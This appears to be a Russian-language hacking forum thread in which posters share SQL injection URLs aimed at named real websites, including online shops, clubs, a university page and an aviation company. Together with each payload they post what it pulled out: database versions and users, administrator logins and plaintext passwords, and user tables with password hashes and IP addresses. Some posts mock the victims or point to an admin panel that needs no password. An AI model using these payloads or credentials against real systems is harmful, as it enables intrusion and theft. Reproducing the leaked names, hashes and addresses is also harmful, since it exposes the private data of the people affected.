http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+F ROM+information_schema.columns+WHERE+column_name=0 x6c6f67696e),6,1))='111 = o
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+F ROM+information_schema.columns+WHERE+column_name=0 x6c6f67696e),7,1))='102 = f
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+F ROM+information_schema.columns+WHERE+column_name=0 x6c6f67696e),8,1))='114 = r
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+F ROM+information_schema.columns+WHERE+column_name=0 x6c6f67696e),9,1))='101 = e
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+F ROM+information_schema.columns+WHERE+column_name=0 x6c6f67696e),10,1))='97 = a
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+F ROM+information_schema.columns+WHERE+column_name=0 x6c6f67696e),11,1))='115 = s
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+F ROM+information_schema.columns+WHERE+column_name=0 x6c6f67696e),12,1))='111 = o
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+F ROM+information_schema.columns+WHERE+column_name=0 x6c6f67696e),13,1))='110 = n
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+F ROM+information_schema.columns+WHERE+column_name=0 x6c6f67696e),14,1))='95 = _
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+F ROM+information_schema.columns+WHERE+column_name=0 x6c6f67696e),15,1))='97 = a
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+F ROM+information_schema.columns+WHERE+column_name=0 x6c6f67696e),16,1))='100 = d
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+F ROM+information_schema.columns+WHERE+column_name=0 x6c6f67696e),17,1))='109 = m
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+F ROM+information_schema.columns+WHERE+column_name=0 x6c6f67696e),18,1))='105 = i
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+F ROM+information_schema.columns+WHERE+column_name=0 x6c6f67696e),19,1))='110 = n
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+F ROM+information_schema.columns+WHERE+column_name=0 x6c6f67696e),20,1))='0
з.ы. имена колонок с паролями и логинами посмотрел в сурсе страницы авторизации админа, очень часто они подходят)

логин админа:
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+p ulseofreason_admin+limit+0,1),1,1))='97 = a
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+p ulseofreason_admin+limit+0,1),2,1))='100 = d
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+p ulseofreason_admin+limit+0,1),3,1))='109 = m
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+p ulseofreason_admin+limit+0,1),4,1))='105 = i
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+p ulseofreason_admin+limit+0,1),5,1))='110 = n
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+p ulseofreason_admin+limit+0,1),6,1))='0

пасс админа:
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FRO M+pulseofreason_admin+where+login=0x61646d696e),1, 1))='97 = a
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FRO M+pulseofreason_admin+where+login=0x61646d696e),2, 1))='100 = d
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FRO M+pulseofreason_admin+where+login=0x61646d696e),3, 1))='109 = m
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FRO M+pulseofreason_admin+where+login=0x61646d696e),4, 1))='105 = i
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FRO M+pulseofreason_admin+where+login=0x61646d696e),5, 1))='110 = n
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FRO M+pulseofreason_admin+where+login=0x61646d696e),6, 1))='0

логин - пасс второго админа: xernya - xernya

Магазин оргтехники 5-я ветка
http://www.05.ru/catalog.php?cid=47 union select 1,concat_ws(0x3a,admin_name,admin_pass),3,4,5,6 FROM admin_users limit 1,1 --
login:pass
azim:4z1m


Ещё один магаз орг техники
http://www.ecopies.ru/showitem.php?itemid=99999+union+select+1,2,concat_ ws(0x3a,username,password),4,5,6,7,8,9,10+FROM users+--
админка http://ecopies.ru/admin/
login :: pass
admin :: ke21pud
можно поглумится ))

http://www.rmets.org/news/detail.php?ID=-332+union+select+1,2,concat _ws(0x3a,version(),database (),user()),4,5,6,7,8+from+users--

Database Version : 4.0.27-standard
Database name : db116118144
User name : dbo116118144@localhost

юзвери:

http://www.rmets.org/news/detail.php?ID=-332+union+select+ 1,2,concat(user_id,0x3a,user_name,0x3a,user_hash,0 x3a,user_emai l),4,5 ,6,7,8+from+users+limit+0,1--

админа так и не нашел :( кто найдёт напишите в п\м ...

================================================== ==========
http://narrow.parovoz.com/emb/?ID=-2+union+select+1,2
version() - 5.0.27-log
database() - gallery
user() - parovoz@localhost
================================================== =========
================================================== ======
http://www.squamlakeschamber.com/display_members.php?id=-3+union+select+version(),2,3,4,5/*
version() - 4.0.26
database() - visitsquam_com
user() - squam@localhost
================================================== ======
================================================== =======
http://www.marathonskating.com/info.php?ID=-3+union+select+1/*
version() - 4.1.22-standard
database() - marathon_marathon
user() - marathon_ave@localhost
================================================== ==========
================================================== ==========
http://www.beagleclub.cz/wp-content/plugins/wp-forum/forum_feed.php?thread=-99999+union+select+1,version(),3,4,5,6,7/*
version() - 5.0.32-Debian_7etch8-log
database() - beagleclub_cz
user() - beagleclub@localhost
================================================== =========
================================================== ============
http://nicolian.com/albom/index.php?start=9&album=-99999+union+select+version()/*
user() - nicolian@10.0.75.17
version() - 4.0.25-standard-log
database() - nicolian
================================================== ============
================================================== =================
http://www.costalindacr.com/ficha.php?id=-3+union+select+1,user()
user() - costalinda@localhost
version() - 4.1.20
database() - db_081
================================================== =================

тут компики продают
http://www.oktop.ru/model.php?cat=mfu&art=-brother7427+union+select+1,2,user_name,user_passwo rd,5,6,7,8,9,10,11,12,13,14,15,16,17 FROM uvarovka_galllery_users/*
5-я ветка
логин пасс админа :: для форума

ak47-111 admin-111

интернет магазин квазар
http://www.kvazar.by/index.php?option=com_simplecat&id=-41%20union%20select%20concat_ws(0x3a%20,version(), database(),user()),2,3--
version::4.1.22
User::kvazar_by@touareg.tutby.com
database::kvazar_by

Мужики,держитесь за штаны)))) я чуть не упал))
http://www.sochi.microlana.ru/admin.php
вход без пароля)))...пол часа искал пасс...а он там не нужен....жесть))

интерет магазин агент 007 8-)
http://www.007.lviv.ua/vuvid.php?id0=-82%20union%20select%201,2,concat_ws(0x3a%20,versio n(),database(),user()),4,5,6,7,8,9,10,11,12,13%20% 20--
version::4.1.22-standard-log
user::uatur_canada@207.181.4.194
database::uatur_ca

MP3Format.ru
http://www.mp3format.ru/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,passwor d)+from+admin
я люблю музыку )


Gsd.umn.edu
http://www.gsd.umn.edu/news.php?id=4299/**/union/**/select/**/version(),2,3,4,5,6,7,8/*
а так же люблю покушать..)

http://www.totaltop.ro/detalii-site.php?site=-28748+UNION+SELECT+1,2,3,4,AES_DECRYPT(AES_ENCRYPT (CONCAT_WS(0x2F2A2A2F,Version(),Database(),User()) ,0x71),0x71),6,7,8,9,10/*



Version: 4.1.11-nt
Database : totaltop
User : totaltop@sh3

Проект Межура
http://kraszem.ru/project.php?id=10+union+select+1,concat(user(),0x3 a,database(),0x3a,version()),3,4,5,6,7--
user(): kraszem@httpd.salamandra.marosnet.net
database():kraszem
version(): 5.0.45
тИЦ:90

http://kraszem.ru/project.php?id=10+union+select+1,concat(user_id,0x 3a,user_login,0x3a,user_password,0x3a,user_hash),3 ,4,5,6,7+from+users--
1:///msn:897c8fde25c5cc5270cda61425eed3c8:660212f559fe8 4b0b13a3d917da18c8a
2:///qwerty:897c8fde25c5cc5270cda61425eed3c8:b2edaa9bbb c9c8a87b5f5e691e5bcc43

jokester: не нужно их докручивать, боян есть боян. Если раскрутить все скули из топика, он разрастётся ещё на 1500 страниц

http://www.ufs-aero.com/pages.php?id=578967543+union+select+1,concat_ws(0x 3a,version(),user(),database())--


Database Version: 5.0.51a-log
Database name: db208210290
User name: dbo208210290@74.208.16.98

База

db208210290

Таблицы

acsales
fleet
fuelprice
nav
news
pages
ufscard
users



Достаём пользователей

http://www.ufs-aero.com/pages.php?id=578967543+UNION+SELECT+1,CONCAT(0x787 3716C696E6A626567696E,(SELECT+CONCAT(firstname,0x3 a,un,0x3a,pw,0x3a,level,0x3a,ip)+FROM+db208210290. users+LIMIT+16,1),0x3a)--

firstname:un:pw:level:ip

:Brent: bheimer: 0449262361ed354cb870302815f9402f :10:71.230.51.69
: UFS-Aero : administrator : 1da1fb3f4e4c97f57b319c47fade82f8 :10:205.238.220.154
:Gareth : gharte: 981d99c1061407bd93f41b5025a4383d :10:71.230.51.69
:Gregg : gheimer : f63ff11aa5b05cfb84cf81292b0f6ba5 :10:205.238.220.154
:Glenn: gstewart: ae463243b033f797858668b931591f92 :5:205.238.220.154
:Jason: jwarren: ab5f90cafb4bd8a13651d78651b89557 :8:205.238.220.154
:Hoyt: hbangs: 8379c86250c50c0537999a6576e18aa7 :10:66.212.1.106
:Dustin: dpalmer: d5751883938853085bd88b2dd8bffce5 :10:75.147.80.202
:Heskel: hburnstein: c00245006b0aa220c36d1657abe1f96f :10:205.238.220.154
:Ronald: rwatters: 2422c55070091c902595772a114aa672 :2:204.223.176.193
::: d41d8cd98f00b204e9800998ecf8427e :0:69.84.207.39
: obinna kingsley : obi:e43dbc651880164a05a28b09cafc738c :2:80.78.215.77
: test: none: 334c4a4c42fdb79d7ebc3e73b517e6f8 :2:66.212.1.106
: Robert: cigarmanbob: e96946e35431ae7293c882f4d0d3398d :2:204.28.140.7
: Hoyt: hvbangs: 0264e1527230cd1780b58623850ff685 :10:205.238.220.154
: Michael :mderk: db205babfde4780567e539b178b2da2c :2:75.146.205.221

blindcanadians.ca - PR6
http://www.blindcanadians.ca/press_releases/index.php?BriefID=-44+UNION+SELECT+1,2,concat_ws(0x3a,version(),user( ),database()),4--
DB Version: 5.0.67-community
User : blindcan_blindca@localhost
DB : blindcan_aebc
Доступна INFORMATION_SCHEMA...
В принципе ничего интересного нет в базе, есть немного мыл, и всякая фигня =(

http://www.brm.ro/root/index.php?page=sondaje&op=vote&id=26+and+1=0+union+select+1,2,3,4,5,concat_ws(0x3 a,version(),database(),user()),7,8,9,10,11--




Version: 5.0.22-community-nt
Database: :brm
User : root@localhost


http://www.brm.ro/root/index.php?page=sondaje&op=vote&id=26+and+1=0+union+select+1,2,3,4,5,group_concat( user,0x3a,password),7,8,9,10,11+from+users--

-----------------------------------------------------------
http://www.umkstroy.ru/shop.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5,6,7,8,9,10,11,12,13,14,15,16--
версия/бд/юзер:
4.1.22-standard:umkstroy_root@localhost:umkstroy_helposcm s
-----------------------------------------------------------

The End!